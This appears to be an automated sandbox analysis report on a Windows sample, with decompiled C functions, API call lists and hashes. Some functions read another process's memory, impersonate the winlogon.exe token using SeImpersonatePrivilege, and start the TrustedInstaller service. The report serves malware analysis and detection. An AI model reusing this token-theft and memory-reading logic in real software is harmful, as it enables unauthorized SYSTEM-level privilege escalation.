                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2827331108-0
                                                                                                                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                                                                                                                  0x00401ac9
                                                                                                                                                                  0x00401ad1
                                                                                                                                                                  0x00401ae1
                                                                                                                                                                  0x00401ae7
                                                                                                                                                                  0x00401ae9
                                                                                                                                                                  0x00401aec
                                                                                                                                                                  0x00401c1b
                                                                                                                                                                  0x00401af2
                                                                                                                                                                  0x00401af2
                                                                                                                                                                  0x00401af8
                                                                                                                                                                  0x00401b0c
                                                                                                                                                                  0x00401b12
                                                                                                                                                                  0x00401b1a
                                                                                                                                                                  0x00401bfd
                                                                                                                                                                  0x00401b20
                                                                                                                                                                  0x00401b26
                                                                                                                                                                  0x00401b2b
                                                                                                                                                                  0x00401b36
                                                                                                                                                                  0x00401b40
                                                                                                                                                                  0x00401b43
                                                                                                                                                                  0x00401b4a
                                                                                                                                                                  0x00401b54
                                                                                                                                                                  0x00401b55
                                                                                                                                                                  0x00401b56
                                                                                                                                                                  0x00401b57
                                                                                                                                                                  0x00401b58
                                                                                                                                                                  0x00401b63
                                                                                                                                                                  0x00401b68
                                                                                                                                                                  0x00401b69
                                                                                                                                                                  0x00401b77
                                                                                                                                                                  0x00401b7d
                                                                                                                                                                  0x00401b82
                                                                                                                                                                  0x00401b82
                                                                                                                                                                  0x00401b88
                                                                                                                                                                  0x00401b8b
                                                                                                                                                                  0x00401b8e
                                                                                                                                                                  0x00401b91
                                                                                                                                                                  0x00401b98
                                                                                                                                                                  0x00401b9b
                                                                                                                                                                  0x00401ba0
                                                                                                                                                                  0x00401ba5
                                                                                                                                                                  0x00401baa
                                                                                                                                                                  0x00401bac
                                                                                                                                                                  0x00401bac
                                                                                                                                                                  0x00401bb2
                                                                                                                                                                  0x00401bb2
                                                                                                                                                                  0x00401bbe
                                                                                                                                                                  0x00401bc4
                                                                                                                                                                  0x00401bc6
                                                                                                                                                                  0x00401bc8
                                                                                                                                                                  0x00401bc8
                                                                                                                                                                  0x00401bd7
                                                                                                                                                                  0x00401be6
                                                                                                                                                                  0x00401bee
                                                                                                                                                                  0x00401bf0
                                                                                                                                                                  0x00401bf0
                                                                                                                                                                  0x00401c02
                                                                                                                                                                  0x00401c0e
                                                                                                                                                                  0x00401c0e
                                                                                                                                                                  0x00401c23

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                                                                  • memset.MSVCRT ref: 00401B4A
                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                                                                                  • String ID: %d %I64x
                                                                                                                                                                  • API String ID: 1126726007-2565891505
                                                                                                                                                                  • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                                                                  0x00401f04
                                                                                                                                                                  0x00401f20
                                                                                                                                                                  0x00401f27
                                                                                                                                                                  0x00401f38
                                                                                                                                                                  0x00401f3f
                                                                                                                                                                  0x00401f4e
                                                                                                                                                                  0x00401f54
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f6e
                                                                                                                                                                  0x00401f72
                                                                                                                                                                  0x00401f77
                                                                                                                                                                  0x00401f78
                                                                                                                                                                  0x00401f91
                                                                                                                                                                  0x00401f7a
                                                                                                                                                                  0x00401f88
                                                                                                                                                                  0x00401f8e
                                                                                                                                                                  0x00401f8e
                                                                                                                                                                  0x00401fa6
                                                                                                                                                                  0x00401fa9
                                                                                                                                                                  0x00401fae
                                                                                                                                                                  0x00401fb0
                                                                                                                                                                  0x00401fb2
                                                                                                                                                                  0x00401fb9
                                                                                                                                                                  0x00401fc2
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00401fd2
                                                                                                                                                                  0x00401fd2
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fe3

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00401F27
                                                                                                                                                                  • memset.MSVCRT ref: 00401F3F
                                                                                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                                                                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                                                                  • API String ID: 3867304300-2177360481
                                                                                                                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t9;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					_t9 = QueryServiceStatus(_t14,  &_v32); // executed
					if(_t9 != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}









                                                                                                                                                                  0x00401319
                                                                                                                                                                  0x0040131b
                                                                                                                                                                  0x00401327
                                                                                                                                                                  0x0040132b
                                                                                                                                                                  0x00401332
                                                                                                                                                                  0x0040133a
                                                                                                                                                                  0x0040134b
                                                                                                                                                                  0x0040134b
                                                                                                                                                                  0x0040134e
                                                                                                                                                                  0x0040134e
                                                                                                                                                                  0x00401353
                                                                                                                                                                  0x0040135b

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                                                                  • String ID: TrustedInstaller
                                                                                                                                                                  • API String ID: 862991418-565535830
                                                                                                                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                                                                  0x0040955f
                                                                                                                                                                  0x00409566
                                                                                                                                                                  0x0040956e
                                                                                                                                                                  0x00409576
                                                                                                                                                                  0x00409586
                                                                                                                                                                  0x00409586
                                                                                                                                                                  0x0040956e
                                                                                                                                                                  0x00409592
                                                                                                                                                                  0x004095aa
                                                                                                                                                                  0x00409594
                                                                                                                                                                  0x004095a3
                                                                                                                                                                  0x004095a6
                                                                                                                                                                  0x004095a6

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                                                                  0x0040a348
                                                                                                                                                                  0x0040a34e
                                                                                                                                                                  0x0040a352
                                                                                                                                                                  0x0040a35f
                                                                                                                                                                  0x0040a363
                                                                                                                                                                  0x0040a369
                                                                                                                                                                  0x0040a371
                                                                                                                                                                  0x0040a374
                                                                                                                                                                  0x0040a37c
                                                                                                                                                                  0x0040a380
                                                                                                                                                                  0x0040a383
                                                                                                                                                                  0x0040a386
                                                                                                                                                                  0x0040a388
                                                                                                                                                                  0x0040a388
                                                                                                                                                                  0x0040a38c
                                                                                                                                                                  0x0040a38f
                                                                                                                                                                  0x0040a39f
                                                                                                                                                                  0x0040a3a1
                                                                                                                                                                  0x0040a3a5
                                                                                                                                                                  0x0040a3a5
                                                                                                                                                                  0x0040a3a9
                                                                                                                                                                  0x0040a3aa
                                                                                                                                                                  0x0040a3b3
                                                                                                                                                                  0x0040a3b3
                                                                                                                                                                  0x0040a37c
                                                                                                                                                                  0x0040a371
                                                                                                                                                                  0x0040a3b8
                                                                                                                                                                  0x0040a3be

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                                  0x00404951
                                                                                                                                                                  0x00404952
                                                                                                                                                                  0x00404956
                                                                                                                                                                  0x004049a1
                                                                                                                                                                  0x00404958
                                                                                                                                                                  0x00404959
                                                                                                                                                                  0x0040495b
                                                                                                                                                                  0x0040495b
                                                                                                                                                                  0x0040495f
                                                                                                                                                                  0x00404961
                                                                                                                                                                  0x00404963
                                                                                                                                                                  0x0040496d
                                                                                                                                                                  0x00404975
                                                                                                                                                                  0x00404977
                                                                                                                                                                  0x0040497b
                                                                                                                                                                  0x00404985
                                                                                                                                                                  0x0040498a
                                                                                                                                                                  0x0040498e
                                                                                                                                                                  0x00404993
                                                                                                                                                                  0x0040499d
                                                                                                                                                                  0x0040499d

                                                                                                                                                                  APIs
                                                                                                                                                                  • malloc.MSVCRT ref: 0040496D
                                                                                                                                                                  • memcpy.MSVCRT ref: 00404985
                                                                                                                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                  • String ID: W@
                                                                                                                                                                  • API String ID: 3056473165-1729568415
                                                                                                                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                                                                  0x0040543f
                                                                                                                                                                  0x00405456
                                                                                                                                                                  0x00405462
                                                                                                                                                                  0x00405467
                                                                                                                                                                  0x0040546d
                                                                                                                                                                  0x00405478
                                                                                                                                                                  0x00405489
                                                                                                                                                                  0x0040548d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405492
                                                                                                                                                                  0x00405496

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                                                                  • wcscat.MSVCRT ref: 00405478
                                                                                                                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3725422290-0
                                                                                                                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
